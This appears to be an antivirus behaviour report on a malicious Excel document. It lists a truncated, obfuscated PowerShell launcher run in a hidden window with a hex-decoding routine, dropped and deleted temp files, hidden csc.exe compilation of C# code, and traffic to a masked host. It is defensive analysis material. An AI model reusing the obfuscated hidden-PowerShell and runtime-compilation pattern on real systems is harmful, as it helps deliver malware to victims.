Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function yaef5f5 {param($r6149e4)$v4cd27='s72c58';$t569a='';for ($i=0; $i -lt $r6149e4.length;$i+=2){$lb3d773=[convert]::ToByte($r6149e4.Substring($i,2),16);$t569a+=[char]...
Modifies file system
Creates the following files
- %TEMP%\qottmaim.0.cs
- %TEMP%\res513b.tmp
- %TEMP%\csc512a.tmp
- %TEMP%\ocppodhu.out
- %TEMP%\ocppodhu.cmdline
- %TEMP%\ocppodhu.0.cs
- %TEMP%\oumrk4q1.dll
- %TEMP%\res3dd2.tmp
- %TEMP%\csc3dc1.tmp
- %TEMP%\oumrk4q1.out
- %TEMP%\oumrk4q1.cmdline
- %TEMP%\oumrk4q1.0.cs
- %TEMP%\2vyuezmz.dll
- %TEMP%\nphiitsc.dll
- %TEMP%\ocppodhu.dll
- %TEMP%\res12f9.tmp
- %TEMP%\res11d0.tmp
- %TEMP%\csc12e9.tmp
- %TEMP%\csc11c0.tmp
- %TEMP%\res6c4.tmp
- %TEMP%\csc6b4.tmp
- %TEMP%\nphiitsc.out
- %TEMP%\nphiitsc.cmdline
- %TEMP%\nphiitsc.0.cs
- %TEMP%\2vyuezmz.out
- %TEMP%\2vyuezmz.cmdline
- %TEMP%\2vyuezmz.0.cs
- %TEMP%\qottmaim.out
- %TEMP%\qottmaim.cmdline
- %TEMP%\qottmaim.dll
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{ab5fee1d-f1a3-477d-83f3-d7ff5f6aa2fe}.tmp
Deletes the following files
- %TEMP%\res11d0.tmp
- %TEMP%\2vyuezmz.out
- %TEMP%\2vyuezmz.dll
- %TEMP%\res3dd2.tmp
- %TEMP%\csc3dc1.tmp
- %TEMP%\oumrk4q1.0.cs
- %TEMP%\oumrk4q1.cmdline
- %TEMP%\oumrk4q1.out
- %TEMP%\ocppodhu.cmdline
- %TEMP%\oumrk4q1.pdb
- %TEMP%\res513b.tmp
- %TEMP%\csc512a.tmp
- %TEMP%\ocppodhu.dll
- %TEMP%\ocppodhu.pdb
- %TEMP%\ocppodhu.out
- %TEMP%\2vyuezmz.pdb
- %TEMP%\oumrk4q1.dll
- %TEMP%\2vyuezmz.cmdline
- %TEMP%\qottmaim.pdb
- %TEMP%\csc11c0.tmp
- %TEMP%\res12f9.tmp
- %TEMP%\csc12e9.tmp
- %TEMP%\res6c4.tmp
- %TEMP%\csc6b4.tmp
- %TEMP%\qottmaim.dll
- %TEMP%\qottmaim.out
- %TEMP%\nphiitsc.dll
- %TEMP%\qottmaim.0.cs
- %TEMP%\qottmaim.cmdline
- %TEMP%\nphiitsc.cmdline
- %TEMP%\nphiitsc.pdb
- %TEMP%\nphiitsc.out
- %TEMP%\nphiitsc.0.cs
- %TEMP%\2vyuezmz.0.cs
- %TEMP%\ocppodhu.0.cs
Network activity
TCP
- 'lu##as.com':443
UDP
- DNS ASK lu##as.com
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function yaef5f5 {param($r6149e4)$v4cd27='s72c58';$t569a='';for ($i=0; $i -lt $r6149e4.length;$i+=2){$lb3d773=[convert]::ToByte($r6149e4.Substring($i,2),16);$t569a+=[char]...' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\qottmaim.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\2vyuezmz.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\nphiitsc.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES6C4.tmp" "%TEMP%\CSC6B4.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES11D0.tmp" "%TEMP%\CSC11C0.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES12F9.tmp" "%TEMP%\CSC12E9.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\oumrk4q1.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES3DD2.tmp" "%TEMP%\CSC3DC1.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ocppodhu.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES513B.tmp" "%TEMP%\CSC512A.tmp"' (with hidden window)
Executes the following
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\qottmaim.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\2vyuezmz.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\nphiitsc.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES6C4.tmp" "%TEMP%\CSC6B4.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES11D0.tmp" "%TEMP%\CSC11C0.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES12F9.tmp" "%TEMP%\CSC12E9.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\oumrk4q1.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES3DD2.tmp" "%TEMP%\CSC3DC1.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ocppodhu.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES513B.tmp" "%TEMP%\CSC512A.tmp"
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding
